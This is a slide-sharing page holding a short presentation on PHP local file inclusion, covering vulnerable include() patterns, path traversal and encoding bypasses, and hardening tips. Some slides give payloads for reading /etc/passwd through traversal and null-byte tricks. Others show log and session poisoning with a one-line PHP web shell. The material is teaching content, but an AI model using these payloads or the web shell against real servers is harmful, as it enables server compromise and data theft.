Uploaded byAaftabKhan14
PPTX, PDF462 views

File inclusion

File inclusion vulnerabilities allow attackers to include local and remote files on a server. If inclusion logic is not implemented properly, it can lead to source code disclosure, data exposure, and remote code execution. Common file inclusion attacks traverse directories, bypass extensions, inject payloads into log files or PHP sessions that are later executed on the server. Proper input validation and restricting included files can help mitigate these risks.

Embed presentation

Downloaded 48 times
$ 7absec -- Aaftab Harun (7absec)
$ 7absec File Inclusion is a common web application vulnerability, which can be easily overlooked as part of the application functionality. Server-side languages such as PHP or JSP can dynamically include external scripts, reducing the script's overall size and simplifying the code.
$ 7absec If the inclusion logic isn't implemented properly, attackers can include both local and remote files, potentially leading to source code disclosure, sensitive data exposure, and code execution under certain conditions.
$ 7absec https://www.ptsecurity.com/ww-en/analytics/web-application-attacks-2019/
$ 7absec Local File Inclusion | Remote File Inclusion
$ 7absec Is an attack done by attacker on WebApp by including the local files that are present on the system.
$ 7absec 1: Explanation -- Use Case 2: LFI with Path Traversal 3: LFI with Blacklisting 4: LFI with Appended Extension 5: LFI to Remote Code Execution A: RCE through Apache / Nginx Log files B: RCE through PHP Session Files 6: Hardening Techniques • The simplest way of local file inclusion. • No restrictions && No parameters. • include($_GET[‘FileName’]);
$ 7absec The World-File inclusion • Linux /etc/passwd http://example.com/?file=/etc/passwd • Windows C:Windowsboot.ini http://example.com/?file=C:Windowsboot.ini 1: Explanation -- Use Case 2: LFI with Path Traversal 3: LFI with Blacklisting 4: LFI with Appended Extension 5: LFI to Remote Code Execution A: RCE through Apache / Nginx Log files B: RCE through PHP Session Files 6: Hardening Techniques
$ 7absec 1: Basic LFI 2: Explanation – Use Case 3: LFI with Blacklisting 4: LFI with Appended Extension 5: LFI to Remote Code Execution A: RCE through Apache / Nginx Log files B: RCE through PHP Session Files 6: Hardening Techniques • Sometimes, developers specify absolute paths when including files. • include("./file/" . $_GET[‘FileName’]); • Input from parameters can even be used as part of filenames. • include(“file_" . $_GET[‘FileName']);
$ 7absec 1: Basic LFI 2: Explanation – Use Case 3: LFI with Blacklisting 4: LFI with Appended Extension 5: LFI to Remote Code Execution A: RCE through Apache / Nginx Log files B: RCE through PHP Session Files 6: Hardening Techniques • This restriction can be bypassed by traversing directories using a few ../ before the desired file name. • http://example.com/?file=../../../../../etc/passwd • http://example.com/?file=/../../../../../etc/passwd
$ 7absec 1: Basic LFI 2: LFI with Path Traversal 3: Explanation – Use Case 4: LFI with Appended Extension 5: LFI to Remote Code Execution A: RCE through Apache / Nginx Log files B: RCE through PHP Session Files 6: Hardening Techniques • Scripts can employ search and replace techniques to avoid path traversals. • $File = str_replace('../', ‘ ', $_GET[‘FileName']);
$ 7absec 1: Basic LFI 2: LFI with Path Traversal 3: Explanation – Use Case 4: LFI with Appended Extension 5: LFI to Remote Code Execution A: RCE through Apache / Nginx Log files B: RCE through PHP Session Files 6: Hardening Techniques • This restriction can be bypassed by ….//….//….// • http://example.com/?file=....//....//...//etc/passwd • Bypass via URL encoding ../ == %2e%2e%2f • http://example.com/?file= %2e%2e%2f etc/passwd
$ 7absec 1: Basic LFI 2: LFI with Path Traversal 3: LFI with Blacklisting 4: Explanation – Use Case 5: LFI to Remote Code Execution A: RCE through Apache / Nginx Log files B: RCE through PHP Session Files 6: Hardening Techniques • Scripts can manually append a .php or any other required extension before including the file • include($_GET['language'] . ".php");
$ 7absec 1: Basic LFI 2: LFI with Path Traversal 3: LFI with Blacklisting 4: Explanation – Use Case 5: LFI to Remote Code Execution A: RCE through Apache / Nginx Log files B: RCE through PHP Session Files 6: Hardening Techniques • PHP versions before 5.5 are vulnerable to null byte injection. • Adding a null byte (x00) at the end of the filename should bypass the extension check. • This can be also bypassed with PHP Wrappers. • http://example.com/?file= /etc/passwdx00
$ 7absec 1: Basic LFI 2: LFI with Path Traversal 3: LFI with Blacklisting 4: LFI with Appended Extension 5: A: RCE through Apache / Nginx Log files B: RCE through PHP Session Files 6: Hardening Techniques • LFI can lead to Remote Code Execution (RCE) under some conditions, resulting in a complete server compromise. • One common way is to poison log files, which are modified based on requests to the webserver.
$ 7absec 1: Basic LFI 2: LFI with Path Traversal 3: LFI with Blacklisting 4: LFI with Appended Extension 5: A: Explanation – Use Case B: RCE through PHP Session Files 6: Hardening Techniques • Apache and Nginx maintain various log files such as access.log and error.log. • The access.log file contains information about all requests made to the server and their User-Agent strings. • http://example.com/?file= /var/log/apache2/access.log
$ 7absec • The log contains the remote IP address, request page, response code, and the user-agent string. • <?php system($_GET['cmd']); ?> 1: Basic LFI 2: LFI with Path Traversal 3: LFI with Blacklisting 4: LFI with Appended Extension 5: A: Explanation – Use Case B: RCE through PHP Session Files 6: Hardening Techniques
$ 7absec 1: Basic LFI 2: LFI with Path Traversal 3: LFI with Blacklisting 4: LFI with Appended Extension 5: A: RCE through Apache / Nginx Log files B: Explanation – Use Case 6: Hardening Techniques • Similar to server log files, PHP saves user sessions on disk. • This path is dictated by the session.save_path configuration variable, which is empty by default. • http://example.com/?file= /var/lib/php/sessions/sess_$id
$ 7absec 1: Basic LFI 2: LFI with Path Traversal 3: LFI with Blacklisting 4: LFI with Appended Extension 5: A: RCE through Apache / Nginx Log files B: Explanation – Use Case 6: Hardening Techniques • Injecting PHP web shell into the session log file • http://example.com/?file= <?php system($_GET['cmd']); ?>
$ 7absec 1: Basic LFI 2: LFI with Path Traversal 3: LFI with Blacklisting 4: LFI with Appended Extension 5: LFI to Remote Code Execution A: RCE through Apache / Nginx Log files B: RCE through PHP Session Files 6: 1: Use built-in tool basename() open_basedir display_errors disable functions (system, shell_exec, curl_exec, etc.) 2: Doing the Correct Checks use allow_list instead of deny_list
$ 7absec Questions/Suggestions…

More Related Content

PPTX
Directory Traversal & File Inclusion Attacks
byRaghav Bisht
 
PPTX
Owasp Top 10 A1: Injection
byMichael Hendrickx
 
PPSX
Web security
bykareem zock
 
PPTX
A5: Security Misconfiguration
byTariq Islam
 
PPTX
Broken Authentication and Authorization(1).pptx
byManahari Darshika Pemarathna
 
PPTX
Cross Site Scripting
byAli Mattash
 
PPTX
Spoofing Techniques
byRaza_Abidi
 
PPTX
Information Security : Is it an Art or a Science
byPankaj Rane
 
Directory Traversal & File Inclusion Attacks
byRaghav Bisht
 
Owasp Top 10 A1: Injection
byMichael Hendrickx
 
Web security
bykareem zock
 
A5: Security Misconfiguration
byTariq Islam
 
Broken Authentication and Authorization(1).pptx
byManahari Darshika Pemarathna
 
Cross Site Scripting
byAli Mattash
 
Spoofing Techniques
byRaza_Abidi
 
Information Security : Is it an Art or a Science
byPankaj Rane
 

What's hot

PPTX
Lfi
bypenetration Tester
 
PPTX
SSRF For Bug Bounties
byOWASP Nagpur
 
PDF
Local File Inclusion to Remote Code Execution
byn|u - The Open Security Community
 
PPTX
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
bySoroush Dalili
 
PPTX
Introduction to path traversal attack
byPrashant Hegde
 
PPTX
OWASP Top 10 2021 What's New
byMichael Furman
 
PDF
Neat tricks to bypass CSRF-protection
byMikhail Egorov
 
PPTX
Waf bypassing Techniques
byAvinash Thapa
 
PPTX
Reverse proxies & Inconsistency
byGreenD0g
 
PPTX
Understanding Cross-site Request Forgery
byDaniel Miessler
 
PDF
HTTP Request Smuggling via higher HTTP versions
byneexemil
 
PPTX
WTF is Penetration Testing v.2
byScott Sutherland
 
PDF
Privilege escalation from 1 to 0 Workshop
byHossam .M Hamed
 
PPTX
A2 - broken authentication and session management(OWASP thailand chapter Apri...
byNoppadol Songsakaew
 
PPTX
Bug Bounty 101
byShahee Mirza
 
PPTX
Burp suite
bySOURABH DESHMUKH
 
PDF
Bug bounty null_owasp_2k17
bySagar M Parmar
 
PPTX
Attacking thru HTTP Host header
bySergey Belov
 
PPTX
OWASP A4 XML External Entities (XXE)
byMichael Furman
 
PPTX
Sql injection in cybersecurity
bySanad Bhowmik
 
Lfi
bypenetration Tester
 
SSRF For Bug Bounties
byOWASP Nagpur
 
Local File Inclusion to Remote Code Execution
byn|u - The Open Security Community
 
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
bySoroush Dalili
 
Introduction to path traversal attack
byPrashant Hegde
 
OWASP Top 10 2021 What's New
byMichael Furman
 
Neat tricks to bypass CSRF-protection
byMikhail Egorov
 
Waf bypassing Techniques
byAvinash Thapa
 
Reverse proxies & Inconsistency
byGreenD0g
 
Understanding Cross-site Request Forgery
byDaniel Miessler
 
HTTP Request Smuggling via higher HTTP versions
byneexemil
 
WTF is Penetration Testing v.2
byScott Sutherland
 
Privilege escalation from 1 to 0 Workshop
byHossam .M Hamed
 
A2 - broken authentication and session management(OWASP thailand chapter Apri...
byNoppadol Songsakaew
 
Bug Bounty 101
byShahee Mirza
 
Burp suite
bySOURABH DESHMUKH
 
Bug bounty null_owasp_2k17
bySagar M Parmar
 
Attacking thru HTTP Host header
bySergey Belov
 
OWASP A4 XML External Entities (XXE)
byMichael Furman
 
Sql injection in cybersecurity
bySanad Bhowmik
 

Similar to File inclusion

PDF
Remote File Inclusion (RFI) Vulnerabilities 101
byImperva
 
PPT
Bypass file upload restrictions
byMukesh k.r
 
DOCX
Web-servers & Application Hacking
byRaghav Bisht
 
PDF
LFI to RCE
byn|u - The Open Security Community
 
PDF
How to Prevent RFI and LFI Attacks
byImperva
 
PDF
File Inclusion.pdf
byOkan YILDIZ
 
PDF
CNIT 129S: 10: Attacking Back-End Components
bySam Bowne
 
PDF
LFI to RCE Exploit with Perl Script
byPrathan Phongthiproek
 
PDF
LFI
byМихаил Фирстов
 
PPTX
Introduction to Penetration Testing
byAndrew McNicol
 
PDF
Php vulnerability presentation
bySqa Enthusiast
 
PDF
Remote File Inclusion / Local File Inclusion [Attack and Defense Techniques]
byIsmail Tasdelen
 
PDF
php secure
byahmed zaichi
 
PPTX
Secure Code Warrior - Local file inclusion
bySecure Code Warrior
 
PPTX
Prevent hacking
byViswanath Polaki
 
PPTX
Lfi rfi
byIlan Mindel
 
PPTX
CodeIgniter i18n Security Flaw
byAbbas Naderi
 
ODP
How secure is your code?
byMikee Franklin
 
PPTX
Secure PHP Coding - Part 1
byVinoth Kumar
 
ODP
Security In PHP Applications
byAditya Mooley
 
Remote File Inclusion (RFI) Vulnerabilities 101
byImperva
 
Bypass file upload restrictions
byMukesh k.r
 
Web-servers & Application Hacking
byRaghav Bisht
 
LFI to RCE
byn|u - The Open Security Community
 
How to Prevent RFI and LFI Attacks
byImperva
 
File Inclusion.pdf
byOkan YILDIZ
 
CNIT 129S: 10: Attacking Back-End Components
bySam Bowne
 
LFI to RCE Exploit with Perl Script
byPrathan Phongthiproek
 
LFI
byМихаил Фирстов
 
Introduction to Penetration Testing
byAndrew McNicol
 
Php vulnerability presentation
bySqa Enthusiast
 
Remote File Inclusion / Local File Inclusion [Attack and Defense Techniques]
byIsmail Tasdelen
 
php secure
byahmed zaichi
 
Secure Code Warrior - Local file inclusion
bySecure Code Warrior
 
Prevent hacking
byViswanath Polaki
 
Lfi rfi
byIlan Mindel
 
CodeIgniter i18n Security Flaw
byAbbas Naderi
 
How secure is your code?
byMikee Franklin
 
Secure PHP Coding - Part 1
byVinoth Kumar
 
Security In PHP Applications
byAditya Mooley
 

Recently uploaded

PDF
How to Connect HP LaserJet MFP M234dwe to WiFi
byPrinter Tales
 
PDF
Artificial Intelligence(AI) full Book.pdf
bydeyanimesh299
 
PDF
Azure Identity, Governance, and Monitoring solutions
byVICTOR MAESTRE RAMIREZ
 
PPT
HDTV and DTV Standards: The United States Opts for a Digital HDTV Standard
byJeffrey Hart
 
PDF
Video Infrastructure_ Streaming Architecture and Delivery Systems.pdf
byTenbyte Limited
 
PDF
Industrial RFID Landscape for 2025 - Readers, Tags, Antennas, Printers, etc
byRich Rogers
 
PPTX
AN Introduction to UNIX File System—An Approach
bysonjuktaweb
 
PPTX
Why 2026 Could Be a Turning Point for Decentralized Exchanges.pptx
bycalliemorgan193
 
PPTX
Salesforce Spring 26 Release Key .pptx
byMehediHasan939830
 
PDF
Top Benefits of Using KVM VPS Hosting for Growing Businesses
byEthernet Servers
 
PDF
Navigating the Spectrum of Advanced AI – Agentic, Autonomous, and Autopoietic...
byScott M. Graffius
 
PPTX
Large Language Model. LLM Audit Artificial Intelligence
byMANASCHOUDHARY22
 
PPTX
Compare and contrast types of attacks.pptx
bysyednaqihassan14
 
PDF
Benefits of Using the IAC 500 Sensor for Ambient Conditions
byCS Instruments
 
PPTX
Document Reconstruction using AI & Deep Learning
bysonjuktaweb
 
PPTX
AI Bot Traffic Surge: Retail Fraud Threat for Age-Restricted Websites
byFTx Identity
 
PDF
A Brief Introduction About Christopher Elwell Woburn
byChristopher Elwell Woburn
 
PDF
IAI-Unit1-notes useful.............................
bydinesh620610
 
PDF
“Lessons from Yesterday's Tomorrowland” by Scott M. Graffius
byScott M. Graffius
 
PDF
Digital Marketing Trends in 2026: AI, Data, Content & Future Growth
byConacent Consulting
 
How to Connect HP LaserJet MFP M234dwe to WiFi
byPrinter Tales
 
Artificial Intelligence(AI) full Book.pdf
bydeyanimesh299
 
Azure Identity, Governance, and Monitoring solutions
byVICTOR MAESTRE RAMIREZ
 
HDTV and DTV Standards: The United States Opts for a Digital HDTV Standard
byJeffrey Hart
 
Video Infrastructure_ Streaming Architecture and Delivery Systems.pdf
byTenbyte Limited
 
Industrial RFID Landscape for 2025 - Readers, Tags, Antennas, Printers, etc
byRich Rogers
 
AN Introduction to UNIX File System—An Approach
bysonjuktaweb
 
Why 2026 Could Be a Turning Point for Decentralized Exchanges.pptx
bycalliemorgan193
 
Salesforce Spring 26 Release Key .pptx
byMehediHasan939830
 
Top Benefits of Using KVM VPS Hosting for Growing Businesses
byEthernet Servers
 
Navigating the Spectrum of Advanced AI – Agentic, Autonomous, and Autopoietic...
byScott M. Graffius
 
Large Language Model. LLM Audit Artificial Intelligence
byMANASCHOUDHARY22
 
Compare and contrast types of attacks.pptx
bysyednaqihassan14
 
Benefits of Using the IAC 500 Sensor for Ambient Conditions
byCS Instruments
 
Document Reconstruction using AI & Deep Learning
bysonjuktaweb
 
AI Bot Traffic Surge: Retail Fraud Threat for Age-Restricted Websites
byFTx Identity
 
A Brief Introduction About Christopher Elwell Woburn
byChristopher Elwell Woburn
 
IAI-Unit1-notes useful.............................
bydinesh620610
 
“Lessons from Yesterday's Tomorrowland” by Scott M. Graffius
byScott M. Graffius
 
Digital Marketing Trends in 2026: AI, Data, Content & Future Growth
byConacent Consulting
 

File inclusion

  • 1.
    $ 7absec -- AaftabHarun (7absec)
  • 2.
    $ 7absec File Inclusionis a common web application vulnerability, which can be easily overlooked as part of the application functionality. Server-side languages such as PHP or JSP can dynamically include external scripts, reducing the script's overall size and simplifying the code.
  • 3.
    $ 7absec If theinclusion logic isn't implemented properly, attackers can include both local and remote files, potentially leading to source code disclosure, sensitive data exposure, and code execution under certain conditions.
  • 4.
  • 5.
    $ 7absec Local FileInclusion | Remote File Inclusion
  • 6.
    $ 7absec Is anattack done by attacker on WebApp by including the local files that are present on the system.
  • 7.
    $ 7absec 1: Explanation -- UseCase 2: LFI with Path Traversal 3: LFI with Blacklisting 4: LFI with Appended Extension 5: LFI to Remote Code Execution A: RCE through Apache / Nginx Log files B: RCE through PHP Session Files 6: Hardening Techniques • The simplest way of local file inclusion. • No restrictions && No parameters. • include($_GET[‘FileName’]);
  • 8.
    $ 7absec The World-Fileinclusion • Linux /etc/passwd http://example.com/?file=/etc/passwd • Windows C:Windowsboot.ini http://example.com/?file=C:Windowsboot.ini 1: Explanation -- Use Case 2: LFI with Path Traversal 3: LFI with Blacklisting 4: LFI with Appended Extension 5: LFI to Remote Code Execution A: RCE through Apache / Nginx Log files B: RCE through PHP Session Files 6: Hardening Techniques
  • 9.
    $ 7absec 1: BasicLFI 2: Explanation – Use Case 3: LFI with Blacklisting 4: LFI with Appended Extension 5: LFI to Remote Code Execution A: RCE through Apache / Nginx Log files B: RCE through PHP Session Files 6: Hardening Techniques • Sometimes, developers specify absolute paths when including files. • include("./file/" . $_GET[‘FileName’]); • Input from parameters can even be used as part of filenames. • include(“file_" . $_GET[‘FileName']);
  • 10.
    $ 7absec 1: BasicLFI 2: Explanation – Use Case 3: LFI with Blacklisting 4: LFI with Appended Extension 5: LFI to Remote Code Execution A: RCE through Apache / Nginx Log files B: RCE through PHP Session Files 6: Hardening Techniques • This restriction can be bypassed by traversing directories using a few ../ before the desired file name. • http://example.com/?file=../../../../../etc/passwd • http://example.com/?file=/../../../../../etc/passwd
  • 11.
    $ 7absec 1: BasicLFI 2: LFI with Path Traversal 3: Explanation – Use Case 4: LFI with Appended Extension 5: LFI to Remote Code Execution A: RCE through Apache / Nginx Log files B: RCE through PHP Session Files 6: Hardening Techniques • Scripts can employ search and replace techniques to avoid path traversals. • $File = str_replace('../', ‘ ', $_GET[‘FileName']);
  • 12.
    $ 7absec 1: BasicLFI 2: LFI with Path Traversal 3: Explanation – Use Case 4: LFI with Appended Extension 5: LFI to Remote Code Execution A: RCE through Apache / Nginx Log files B: RCE through PHP Session Files 6: Hardening Techniques • This restriction can be bypassed by ….//….//….// • http://example.com/?file=....//....//...//etc/passwd • Bypass via URL encoding ../ == %2e%2e%2f • http://example.com/?file= %2e%2e%2f etc/passwd
  • 13.
    $ 7absec 1: BasicLFI 2: LFI with Path Traversal 3: LFI with Blacklisting 4: Explanation – Use Case 5: LFI to Remote Code Execution A: RCE through Apache / Nginx Log files B: RCE through PHP Session Files 6: Hardening Techniques • Scripts can manually append a .php or any other required extension before including the file • include($_GET['language'] . ".php");
  • 14.
    $ 7absec 1: BasicLFI 2: LFI with Path Traversal 3: LFI with Blacklisting 4: Explanation – Use Case 5: LFI to Remote Code Execution A: RCE through Apache / Nginx Log files B: RCE through PHP Session Files 6: Hardening Techniques • PHP versions before 5.5 are vulnerable to null byte injection. • Adding a null byte (x00) at the end of the filename should bypass the extension check. • This can be also bypassed with PHP Wrappers. • http://example.com/?file= /etc/passwdx00
  • 15.
    $ 7absec 1: BasicLFI 2: LFI with Path Traversal 3: LFI with Blacklisting 4: LFI with Appended Extension 5: A: RCE through Apache / Nginx Log files B: RCE through PHP Session Files 6: Hardening Techniques • LFI can lead to Remote Code Execution (RCE) under some conditions, resulting in a complete server compromise. • One common way is to poison log files, which are modified based on requests to the webserver.
  • 16.
    $ 7absec 1: BasicLFI 2: LFI with Path Traversal 3: LFI with Blacklisting 4: LFI with Appended Extension 5: A: Explanation – Use Case B: RCE through PHP Session Files 6: Hardening Techniques • Apache and Nginx maintain various log files such as access.log and error.log. • The access.log file contains information about all requests made to the server and their User-Agent strings. • http://example.com/?file= /var/log/apache2/access.log
  • 17.
    $ 7absec • Thelog contains the remote IP address, request page, response code, and the user-agent string. • <?php system($_GET['cmd']); ?> 1: Basic LFI 2: LFI with Path Traversal 3: LFI with Blacklisting 4: LFI with Appended Extension 5: A: Explanation – Use Case B: RCE through PHP Session Files 6: Hardening Techniques
  • 18.
    $ 7absec 1: BasicLFI 2: LFI with Path Traversal 3: LFI with Blacklisting 4: LFI with Appended Extension 5: A: RCE through Apache / Nginx Log files B: Explanation – Use Case 6: Hardening Techniques • Similar to server log files, PHP saves user sessions on disk. • This path is dictated by the session.save_path configuration variable, which is empty by default. • http://example.com/?file= /var/lib/php/sessions/sess_$id
  • 19.
    $ 7absec 1: BasicLFI 2: LFI with Path Traversal 3: LFI with Blacklisting 4: LFI with Appended Extension 5: A: RCE through Apache / Nginx Log files B: Explanation – Use Case 6: Hardening Techniques • Injecting PHP web shell into the session log file • http://example.com/?file= <?php system($_GET['cmd']); ?>
  • 20.
    $ 7absec 1: BasicLFI 2: LFI with Path Traversal 3: LFI with Blacklisting 4: LFI with Appended Extension 5: LFI to Remote Code Execution A: RCE through Apache / Nginx Log files B: RCE through PHP Session Files 6: 1: Use built-in tool basename() open_basedir display_errors disable functions (system, shell_exec, curl_exec, etc.) 2: Doing the Correct Checks use allow_list instead of deny_list
  • 21.